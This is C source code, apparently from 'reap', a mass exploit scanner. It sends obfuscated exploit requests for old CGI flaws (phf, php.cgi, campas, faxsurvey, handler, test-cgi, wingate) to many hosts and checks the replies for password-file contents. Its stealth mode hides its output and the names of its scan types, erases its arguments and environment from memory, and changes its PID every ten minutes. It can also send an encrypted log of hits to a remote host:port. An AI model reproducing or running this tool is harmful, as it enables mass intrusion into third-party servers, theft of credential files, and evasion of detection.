#ifndef STEALTH_MODE

void supported(void)
{
	int	i,len;

	fprintf(stderr,"%s\nSupported exploits:\n",REAP_C_VERSION);

	len = 0;
	for(i=0;scan_types[i].name;i++)
	{
		if ((len + strlen(scan_types[i].name)) > 60)
		{
			fprintf(stderr,"\n");
			len = 0;
		}
		fprintf(stderr,"%s%s",scan_types[i].name,(scan_types[i+1].name) ? ", " : "");
		len += strlen(scan_types[i].name);
	}
	fprintf(stderr,"\n");
	fflush(stderr);
	exit(0);	
}

#endif /* STEALTH_MODE */

__asmargs__(3,
int strnicmp(char *str1, char *str2, int num))
{
	char	*end;

	end = str1 + num;
	while(*str1 && *str2 && (toupper(*str1) == *str2))
	{
		str1++;
		str2++;
		if (str1 >= end)
			return(0);
	}
	if (*str1 || *str2)
		return(1);
	return(0);
}

char	*rem_tags[] =
{
	"AGE: ",
	"DATE: ",
	"X-CACHE: ",
	"SET-COOKIE: ",
	"CONNECTION: ",
	"CONTENT-TYPE: ",
	"CACHE-CONTROL: ",
	"CONTENT-LENGTH: ",
	NULL
};

__asmargs__(2,
void putbuf(char *buf, uchar *push_type))
{
	char	*last,*cur,*n;
	int	i,j,istag,qu1,qu2,nl;

	if ((i = strlen(buf)) > putbuf_len)
	{
		if (putbuf_len != -1)
			free(putbuf_new);
		putbuf_new = (char*)calloc(1,i+1);
		putbuf_len = i;
	}
	if (opt_nohtml)
	{
		nl = qu1 = qu2 = istag = FALSE;
		n = cur = buf;
		while(cur && *cur)
		{
			if (nl)
			{
				for(j=0;(rem_tags[j]);j++)
				{
					if (!strnicmp(cur,rem_tags[j],strlen(rem_tags[j])))
					{
						while(*cur && *cur != '\n')
							cur++;
						if (*cur == '\n')
							cur++;
					}
				}
			}
			if (*cur == '\r')
				*cur = '\n';
			if (*cur == '\n')
				nl = TRUE;
			else
				nl = FALSE;
			if ((!qu1) && (*cur == '"'))
			{
				if (qu2)
					qu2 = FALSE;
				else
					qu2 = TRUE;
			}
			if ((!qu2) && (*cur == '\''))
			{
				if (qu1)
					qu1 = FALSE;
				else
					qu1 = TRUE;
			}
			if ((!qu1 && !qu2) && (*cur == '<'))
				istag = TRUE;
			if (!istag)
			{
				*n = *cur;
				n++;
			}
			if ((!qu1 && !qu2) && (*cur == '>'))
				istag = FALSE;
			cur++;
		}
		*n = 0;
	}
	cur = buf;
	last = buf;
	n = putbuf_new;
	while(*cur)
	{
		if (*cur == '\r')
			*cur = '\n';
		if (!((*last == '\n') && (*cur == *last)))
		{
			*n = *cur;
			n++;
		}
		last = cur;
		cur++;
	}
	*n = 0;
	xout("%s",putbuf_new);

#ifndef STEALTH_MODE

/*--------------*/
/* phf		*/
	if (push_type == push1)
	{
		if (strstr(buf,"_phf-begin_") != NULL)
			pgchar = HIT;
	}
/* webdist	*/
	if (push_type == pushB)
	{
		if (strstr(buf,"\nid-webdist") != NULL)
			pgchar = HIT;
	}
/* campas	*/
	if (push_type == push6)
	{
		if (strstr(buf,"\nid-campas") != NULL)
			pgchar = HIT;
	}
/* aglimpse	*/
	if (push_type == pushC)
	{
		if (strstr(buf,"\nid-aglimpse") != NULL)
			pgchar = HIT;
	}
/* faxsurvey	*/
	if (push_type == pushH)
	{
		if (strstr(buf,"\nid-faxsurvey") != NULL)
			pgchar = HIT;
	}
/* perl		*/
	if (push_type == pushF) 
	{
		if (strstr(buf,"_perl-begin_") != NULL)
			pgchar = HIT;
	}
/* php.cgi	*/
/* pfdispaly	*/
/* handler	*/
	if ((push_type == push2) || (push_type == push8) || (push_type == push9))
	{
		if (strstr(buf,"\nroot:") != NULL)
			pgchar = HIT;
	}
/* popscan	*/
	if (push_type == pushG)
	{
		if (strstr(buf,"QPOP") != NULL)
			pgchar = HIT;
	}
/* test-cgi	*/
/* nph-test-cgi	*/
	if ((push_type == pushI) || (push_type == push7))
	{
		if (strstr(buf,"CONTENT_TYPE") != NULL)
		{
			if (strstr(buf,"test-cgi") != NULL)
				pgchar = HIT;
		}
	}
/* wingate	*/
	if (push_type == pushK)
	{
		if (strstr(buf,"WinGate") != NULL)
			pgchar = HIT;
	}
/*--------------*/
#endif /* STEALTH_MODE */
}

inline void unmask(uchar *p, int len)
{
	ushort	xor,next;

	if (!*p)
		return;
	xor = (0xe917 * *p);
	*p = 0;
	p++;
	while(len--)
	{
		next = (0xe917 * *p);
		*p = *p ^ xor;
		xor = next;
		p++;
	}
}

#ifdef STEALTH_MODE

__asmargs__(1,
ushort xsum(char *arg))
{
	ushort	x;

	x = 0;
	while(arg && *arg)
	{
		x = x ^ (0xe917 * *arg);
		arg++;
	}
	return(x);
}

#endif /* STEALTH_MODE */

__asmargs__(1,
void setChain(char *arg))
{
	aChain	*new;
	char	*p;
	int	i;

	if ((!strcmp(arg,"*")) || (!strcmp(arg,"all")))
	{
		c0 = cn = scan_all;
		return;
	}

	arg = strdup(arg);
	p = strtok(arg,",");
	while(p && *p)
	{
		for (i=0;scan_types[i].req;i++)
		{
#ifdef STEALTH_MODE
			if (xsum(p) == scan_types[i].xsum)
				break;
#else /* STEALTH_MODE */
			if (!strcmp(p,scan_types[i].req))
				break;
			if (!strcmp(p,scan_types[i].req))
				break;
#endif /* STEALTH_MODE */
		}
		if (!scan_types[i].req)
		{
#ifndef STEALTH_MODE
			fprintf(stderr,"reap: unknown scan type '%s'\n",p);
#endif /* STEALTH_MODE */
			usage();
		}
		new = (aChain*)calloc(1,sizeof(aChain));
		new->which = &scan_types[i];
		new->next = c0;
		c0 = new;
		p = strtok(NULL,",");
	}
	free(arg);
}

__asmargs__(1,
int set_inet_fd(char *arg))
{
	struct	sockaddr_in sai;
	char	*pp;
	unsigned long uip;
	int	i,s,pn;

	arg = strdup(arg);

	pp = strtok(arg,":");
	if (!pp || !*pp)
		goto err_out;
	uip = inet_addr(pp);
	if (uip == -1)
		goto err_out;
	pp = strtok(NULL,":");
	if (!pp || !*pp)
		goto err_out;
	pn = atoi(pp);
	if ((pn < 1) || (pn > 65535))
		goto err_out;
	if ((s = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)
		goto err_out;
	sai.sin_family = AF_INET;
	sai.sin_addr.s_addr = uip;
	sai.sin_port = htons(pn);
	if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
		goto err_out;
	out_fd = s;
	fclose(stdout);
#ifndef STEALTH_MODE
	fprintf(stderr,"reap: transmitting log to %s:%i\n",inet_ntoa(sai.sin_addr),pn);
#endif /* STEALTH_MODE */
	opt_inet_fd = TRUE;
	if (opt_inet_encrypt)
	{
		srand(now);
		for(i=0;i<10;i++)
			inet_xor[i] = (rand() >> 24) & 0xff;
		write(s,inet_xor,10);
		xor_ct = 0;
	}
	free(arg);
	return(0);
err_out:
	free(arg);
	return(-1);
}

int main(int argc, char **argv)
{
	struct	rlimit rl;
	struct	timeval tv;
	struct	passwd *pwd;
	fd_set	rd,wd;
	char	inbuf[1024],*p,*nargv[50],*progname,*qp;
	ulong	timeout,timeout2;
	uid_t	runuid;
	time_t	now,fork_time;
	int	retval,i,max,inlen,maxfd,x;
	int	highsock,nofile,c;
	int	timeout_max,timeout_connect;
	int	quashed,qlen;

	progname = argv[0];
	now = time(NULL);

	/* unhide SCAN_* environment strings */
	for(i=0;i<MAXENV;i++)
	{
		envs[i][0] = 'S';
		envs[i][1] = 'C';
		envs[i][2] = 'A';
		envs[i][3] = 'N';
		envs[i][4] = '_';
	}
	dofork = FALSE;
	nofile = TRUE;
	opt_ipsmode = FALSE;

#ifndef STEALTH_MODE
	progress = FALSE;
	pr_willcount = 100;
	pr_cnt = 0;
	pgchar = MISS;
#endif /* STEALTH_MODE */

	putbuf_new = NULL;
	cn = NULL;
	c0 = NULL;
	IPRrange = NULL;

	fork_time = 0;
	timeout_max = 10;
	timeout_connect = 5;
	maxfd = 1020;
	st_cnt = 0;
	pr_m = 0;
	putbuf_len = -1;
	con_ct = 0;
	quashed = 0;
	qp = NULL;
	qlen = 0;
	socknum = 65535;
	set_to_nocon = 0;

	opt_nohtml = FALSE;
	opt_inet_fd = FALSE;
	opt_inet_encrypt = TRUE;
	opt_multiscan = FALSE;

	out_fd = fileno(stdout);

	runuid = getuid();

	if ((p = getenv(__scan_arg)) != NULL)
	{
		qlen = strlen(p);
		qp = p;
		i = 0;
		nargv[0] = argv[0];
		p = strtok(p," ");
		while(p && *p)
		{
			i++;
			nargv[i] = p;
			p = strtok(NULL," ");
		}
		nargv[++i] = NULL;
		argv = nargv;
		argc = i;
		quashed++;
	}
	p = getenv(__scan_type);
	if (p && *p)
	{
		setChain(p);
	}
	if ((p = getenv(__scan_uid)))
	{
		if (is_number(p))
		{
			runuid = atoi(p);
		}
		else
		{
			pwd = getpwnam(p);
			if (!pwd)
			{
#ifndef STEALTH_MODE
				fprintf(stderr,"reap: unknown user = \"%s\"\n",p);
#endif /* STEALTH_MODE */
				exit(1);
			}
			runuid = pwd->pw_uid;
		}
	}
	if ((p = getenv(__scan_log)))
	{
		if (strchr(p,':'))
		{
			if (set_inet_fd(p) < 0)
			{
#ifndef STEALTH_MODE
				fprintf(stderr,"reap: unable to connect to host\n");
#endif /* STEALTH_MODE */
				exit(1);
			}
		}
	}

#ifdef STEALTH_MODE

#define GETOPT_ARGS	"bC:dEFf:g:n:o:q:t:u:x:z"

#else /* STEALTH_MODE */

#define GETOPT_ARGS	"bC:dEFf:g:hln:o:P:pq:t:u:Vx:z"

#endif /* STEALTH_MODE */

	while ((c = getopt(argc,argv,GETOPT_ARGS)) != EOF)
	{
		switch(c)
		{
		case 'b':
			dofork = TRUE;
#ifndef STEALTH_MODE
			if (progress)
			{
				fprintf(stderr,"reap: -b (backgrounding) excludes -p (progress)\n");
				fflush(stderr);
				progress = FALSE;
			}
#endif /* STEALTH_MODE */
			break;
		case 'C':
			timeout_connect = atoi(optarg);
			break;
		case 'E':
			opt_inet_encrypt = FALSE;
			break;
		case 'F':
			/* quick hack: dont fork for ~(a month) */
			fork_time = now + 2592000;
			break;
		case 'f':
			if (!nofile)
				usage();
			nofile = FALSE;
			if (!strcmp(optarg,"-"))
				hostfile = stdin;
			else
			{
				if ((hostfile = fopen(optarg,"r")) == NULL)
				{
#ifndef STEALTH_MODE
					fprintf(stderr,"reap: failed to open %s\n",optarg);
					fflush(stderr);
#endif /* STEALTH_MODE */
					exit(1);
				}
			}
			break;
		case 'g':
			initipgen(optarg);
			break;
#ifndef STEALTH_MODE
		case 'h':
			usage();
		case 'l':
			supported();
#endif /* STEALTH_MODE */
		case 'n':
			maxfd = atoi(optarg);
			if (maxfd < 10)
				maxfd = 10;
			break;
		case 'o':
			if (strchr(optarg,':'))
			{
				if (set_inet_fd(optarg) < 0)
				{
#ifndef STEALTH_MODE
					fprintf(stderr,"reap: unable to connect to host\n");
#endif /* STEALTH_MODE */
					exit(1);
				}
			}
			break;
#ifndef STEALTH_MODE
		case 'P':
			if (is_number(optarg))
			{
				pr_willcount = atoi(optarg);
			}
			else
			{
				fprintf(stderr,"reap: -P requires a numeric argument\n");
				fflush(stderr);
				exit(1);
			}
			break;
		case 'p':
			progress = TRUE;
			if (dofork)
			{
				fprintf(stderr,"reap: -p (progress) excludes -b (backgrounding)\n");
				dofork = FALSE;
			}
			break;
#endif /* STEALTH_MODE */
		case 'q':
			if (quashed)
				break;
			inlen = 0;
			i = 1;
			p = argv[1];
			while(p && *p)
			{
				inlen += strlen(p) + 1;
				i++;
				p = argv[i];
			}
			p = malloc(inlen+15);
			sprintf(p,"%s=",__scan_arg);
			i = 1;
			while(argv[i])
			{
				if (!strncmp("-q",argv[i],2))
				{
					if (argv[i][2] == 0)
						i++;
				}
				else
				{
					strcat(p,argv[i]);
					strcat(p," ");
				}
				i++;
			}
			putenv(p);
#ifdef DEBUG
			fprintf(stderr,"%s %s\n",optarg,p);
#endif
			argv[0] = optarg;
			argv[1] = NULL;
			execvp(progname,argv);
			exit(1);
			break;
		case 't':
			timeout_max = atoi(optarg);
			break;
		case 'u':
			if (is_number(optarg))
			{
				runuid = atoi(optarg);
			}
			else
			{
				pwd = getpwnam(optarg);
				if (!pwd)
				{
#ifndef STEALTH_MODE
					fprintf(stderr,"reap: unknown user = \"%s\"\n",optarg);
					fflush(stderr);
#endif /* STEALTH_MODE */
					exit(1);
				}
				runuid = pwd->pw_uid;
			}
			break;
#ifndef STEALTH_MODE
		case 'V':
			fprintf(stderr,"%s\n",REAP_C_VERSION);
			exit(0);
#endif /* STEALTH_MODE */
		case 'x':
			c0 = cn = NULL;
			setChain(optarg);
			break;
		case 'z':
			opt_nohtml++;
			break;
		default:
			usage();
		}
	}

	if (c0 == NULL)
		setChain("phf");

	if (nofile)
		hostfile = stdin;

	for(i=0;i<MAXSOCK;i++)
		hst[i].sock = -1;

	signal(SIGINT, sig_die);
	signal(SIGTERM,sig_die);
	signal(SIGHUP, SIG_IGN);
	signal(SIGALRM,SIG_IGN);
	signal(SIGPIPE,SIG_IGN);
	signal(SIGUSR1,sig_show);

	getrlimit(RLIMIT_NOFILE,&rl);
	maxfd = (rl.rlim_max >= maxfd) ? maxfd : rl.rlim_max;
	rl.rlim_cur = maxfd;
	setrlimit(RLIMIT_NOFILE,&rl);

#ifndef STEALTH_MODE
	fprintf(stderr,"reap: using %i sockets\n",maxfd);
	fflush(stderr);
#endif /* STEALTH_MODE */

	if (dofork)
	{
		if (fork())
			_exit(0);
		setsid();
	}

	if (runuid != getuid())
	{
		setuid(runuid);
		seteuid(runuid);
	}

	if ((!IPRrange) && (getenv(__scan_ips) != NULL))
		initipgen(getenv(__scan_ips));

	st_time = now;

	for(cn=c0;(cn);cn=cn->next)
		unmask(cn->which->req,cn->which->len);

	cn = c0;
	if (cn->next != NULL)
		opt_multiscan++;

	for(i=0;i<MAXENV;i++)
	{
		p = getenv(envs[i]);
		if (p && *p)
		{
			p -= strlen(envs[i]);
			while(*p)
				*p = 0, p++;
		}
	}

	if (qp)
	{
		while(qlen)
		{
			*qp = 0;
			qp++;
			qlen--;
		}
	}

	hst[0].buf = (char*)calloc(maxbuf+2,maxfd+1);
	if (hst[0].buf == NULL)
	{
#ifdef DEBUG
		fprintf(stderr,"unable to allocate %i bytes of memory\n",(maxbuf+2) * maxfd);
#endif
		exit(1);
	}
#ifndef STEALTH_MODE
	fprintf(stderr,"reap: allocated %i bytes of memory\n",(maxbuf+2) * (maxfd+1));
#endif /* STEALTH_MODE */
	for(i=1;i<maxfd;i++)
	{
		hst[i].buf = hst[0].buf + ((maxbuf+2) * i);
	}

	utc_timestamp(TRUE);
	xout("%s","\n");

	/* fork to a new PID every 10 minutes */
	if (fork_time == 0)
		fork_time = now + 600;

	now = time(NULL);

	while(TRUE)
	{
		if (now > fork_time)
		{
			if (fork())
				_exit(0);
			fork_time = now + 600;
		}

		FD_ZERO(&rd);
		FD_ZERO(&wd);

		tv.tv_sec = 2;
		tv.tv_usec = 0;

		opensock = 0;
		highsock = 0;

		for(i=0;i<maxfd;i++)
		{
			if ((hst[i].sock < 0) && (nocon == -1) && (socknum))
			{
				if (newsock(&hst[i],now) >= 0)
				{
					sprintf(hst[i].buf,"** HO: %s\n",hostbuf);
				}
			}

			if (hst[i].sock >= 0)
			{
				opensock++;
				if (hst[i].pump == 0)
					FD_SET(hst[i].sock,&wd);
				FD_SET(hst[i].sock,&rd);
				if (hst[i].sock > highsock)
					highsock = hst[i].sock;
			}
		}

		if ((opensock == 0) && (nocon == -2))
		{
			fclose(hostfile);
#ifndef STEALTH_MODE
			if (progress)
			{
				fprintf(stderr,"\n");
				fflush(stderr);
			}
#endif /* STEALTH_MODE */
			st_time = now - st_time + 1;
			xout("** %i tests, %lu seconds, %lu tests/hour, %i connects\n",
				st_cnt,st_time,((st_cnt * 3600)/st_time),con_ct);
			utc_timestamp(TRUE);
			xout("** SE\n");
			exit(0);
		}

		if (opensock == 0)
			continue;

		retval = select(++highsock,&rd,&wd,0,&tv);
		if ((retval == -1) && (errno == EINTR))
			continue;

		time(&now);
		timeout = now - timeout_max;
		timeout2 = now - timeout_connect;

		for(i=0;i<maxfd;i++)
		{
			if (hst[i].sock < 0)
				continue;

			if ((hst[i].pump == 0) && (FD_ISSET(hst[i].sock,&wd)))
			{
				if ((inlen = send(hst[i].sock,&hst[i].which->req[1],hst[i].which->len,0)) < 0)
				{
					close(hst[i].sock);
					socknum++;
					hst[i].sock = -1;
					continue;
				}
				con_ct++;
				hst[i].pump = 1;
				hst[i].lasttime = now;
				continue;
			}

			if (FD_ISSET(hst[i].sock,&rd))
			{
read_again:
				if ((inlen = read(hst[i].sock,inbuf,1000)) < 0)
				{
					if (errno == EAGAIN)
						goto read_nomore;
					close(hst[i].sock);
					socknum++;
					hst[i].sock = -1;
					continue;
				}
				if (inlen == 0)
				{
					if (hst[i].hasdata > 0)
					{
						strcat(hst[i].buf,"\n");
						putbuf(hst[i].buf,hst[i].which->req);
						xout("** EO\n\n");
					}
					close(hst[i].sock);
					socknum++;
					hst[i].sock = -1;
					continue;
				}
				if (hst[i].which->req == pushD)
				{
					for(x=0;x<inlen;x++)
						if (inbuf[x] == 0)
							inbuf[x] = 32;
				}
				max = strlen(hst[i].buf);
				if (inlen+max >= maxbuf)
				{
					strcat(inbuf,"\n");
					putbuf(hst[i].buf,hst[i].which->req);
					putbuf(inbuf,hst[i].which->req);
					xout("** MB\n\n");
					close(hst[i].sock);
					socknum++;
					hst[i].sock = -1;
					continue;
				}
				hst[i].lasttime = now;
				strncat(hst[i].buf,inbuf,inlen);
				hst[i].hasdata = 1;
				goto read_again;
read_nomore:
			}
			if ((hst[i].lasttime < timeout2) ||
			   ((hst[i].pump != 1) && (hst[i].lasttime < timeout)))
			{
				if (hst[i].hasdata > 0)
				{
					strcat(hst[i].buf,"\n");
					putbuf(hst[i].buf,hst[i].which->req);
					xout("** TO\n\n");
				}
				close(hst[i].sock);
				socknum++;
				hst[i].sock = -1;
			}
		}
	}
}
